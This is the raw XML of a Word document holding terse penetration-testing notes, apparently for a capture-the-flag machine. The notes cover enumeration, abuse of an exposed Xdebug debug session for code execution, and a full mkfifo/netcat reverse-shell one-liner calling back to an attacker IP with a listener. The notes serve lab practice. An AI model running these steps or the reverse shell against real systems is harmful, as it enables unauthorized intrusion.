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0CCB" w:rsidTr="00140CCB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002E3801" w:rsidRDefault="007F5C20" w:rsidP="002E3801">
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidR="002E3801">
              <w:t xml:space="preserve"> -sC -sV -oA  result ipaddress</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000149EB" w:rsidRDefault="000149EB" w:rsidP="002E3801">
            <w:r>
              <w:t>-sC (default Script)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000149EB" w:rsidRDefault="000149EB" w:rsidP="002E3801">
            <w:r>
              <w:t>-sV(</w:t>
            </w:r>
            <w:r w:rsidR="007B035C">
              <w:t>Enumerate</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> version)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000149EB" w:rsidRPr="002E3801" w:rsidRDefault="000149EB" w:rsidP="000149EB">
            <w:r>
              <w:t>-oA(output result to file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00081103" w:rsidTr="00140CCB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00081103" w:rsidRDefault="004B69C3" w:rsidP="002E3801">
            <w:r>
              <w:t xml:space="preserve">check the result.namp </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B69C3" w:rsidTr="00140CCB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004B69C3" w:rsidRDefault="00592652" w:rsidP="002E3801">
            <w:r>
              <w:t>Check dns  to get hostname</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00592652" w:rsidRDefault="00592652" w:rsidP="002E3801">
            <w:r>
              <w:t xml:space="preserve">nslookup </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00592652" w:rsidRDefault="00592652" w:rsidP="00592652">
            <w:r>
              <w:t>server ipddress</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00592652" w:rsidRDefault="00592652" w:rsidP="00592652">
            <w:r>
              <w:t>127.0.0.1 (check if no revers lookup)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00592652" w:rsidRDefault="00592652" w:rsidP="00592652">
            <w:r>
              <w:t>10.10.10.83(check if no revers lookup)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00592652" w:rsidRDefault="00592652" w:rsidP="00592652">
            <w:r>
              <w:t>Exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00592652" w:rsidTr="00140CCB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00592652" w:rsidRDefault="00592652" w:rsidP="002E3801">
            <w:r>
              <w:t>check apache</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00414F70" w:rsidRDefault="00414F70" w:rsidP="002E3801">
            <w:r>
              <w:t xml:space="preserve">firefox </w:t>
            </w:r>
            <w:r w:rsidR="00601FA4">
              <w:t>ipddress</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00592652" w:rsidRDefault="00414F70" w:rsidP="00414F70">
            <w:r>
              <w:t xml:space="preserve">check for any details in the site </w:t>
            </w:r>
            <w:r w:rsidR="00592652">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> such as image and others</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4E0A" w:rsidRDefault="006E4E0A" w:rsidP="00414F70">
            <w:r>
              <w:t>check if the site has robots.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4E0A" w:rsidRDefault="006E4E0A" w:rsidP="00414F70">
            <w:r>
              <w:t>ipddress/robots.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF595A" w:rsidRDefault="00FF595A" w:rsidP="00414F70">
            <w:r>
              <w:t>check image via exiftool</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF595A" w:rsidRDefault="00FF595A" w:rsidP="00414F70">
            <w:r>
              <w:t>exiftool image.jpg</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00772D76" w:rsidRDefault="00772D76" w:rsidP="00414F70">
            <w:r>
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:r w:rsidR="00BD0E2E">
              <w:t>burp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> suit to check if the site is leaking something</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007506D9" w:rsidRDefault="009765F7" w:rsidP="00414F70">
            <w:r>
              <w:t>check if the site is in debug mode xdebug</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="00414F70">
            <w:r>
              <w:t>use burp repeater to access site debug mode by sending below command</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>XDEBUG_SESSION_START=ANYTHING</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>Use chrome extension xdebug to listen and intercept the traffic</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>Check if you can have code execution on the box</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>system(“ping -c 5 yourIpaddress”)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t xml:space="preserve">track above command </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>tcpdump -i tun0 icmp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>If you have code execution, now lookup for reverse shell</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r w:rsidRPr="009765F7">
              <w:t>System("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.12.118 9001 &gt;/tmp/f")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>Listen for port 9001</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7">
            <w:r>
              <w:t>nc -lvnp 9001</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w:rsidR="009765F7" w:rsidRDefault="009765F7" w:rsidP="009765F7"/>
          <w:p w:rsidR="00772D76" w:rsidRDefault="00772D76" w:rsidP="00414F70"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC7579" w:rsidRDefault="009765F7"/>
    <w:sectPr w:rsidR="00AC7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4D"/>
    <w:rsid w:val="000149EB"/>
    <w:rsid w:val="00081103"/>
    <w:rsid w:val="00140CCB"/>
    <w:rsid w:val="001864DD"/>
    <w:rsid w:val="002E3801"/>
    <w:rsid w:val="00302E4D"/>
    <w:rsid w:val="00414F70"/>
    <w:rsid w:val="004B69C3"/>
    <w:rsid w:val="00592652"/>
    <w:rsid w:val="00601FA4"/>
    <w:rsid w:val="006E4E0A"/>
    <w:rsid w:val="007506D9"/>
    <w:rsid w:val="00772D76"/>
    <w:rsid w:val="007B035C"/>
    <w:rsid w:val="007F5C20"/>
    <w:rsid w:val="009144A5"/>
    <w:rsid w:val="009765F7"/>
    <w:rsid w:val="00BD0E2E"/>
    <w:rsid w:val="00D97CF3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A363"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{538CBADD-FBC8-4B75-AE29-28ABDDDF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m_s802</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>m_s802</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-30T21:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-01T23:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>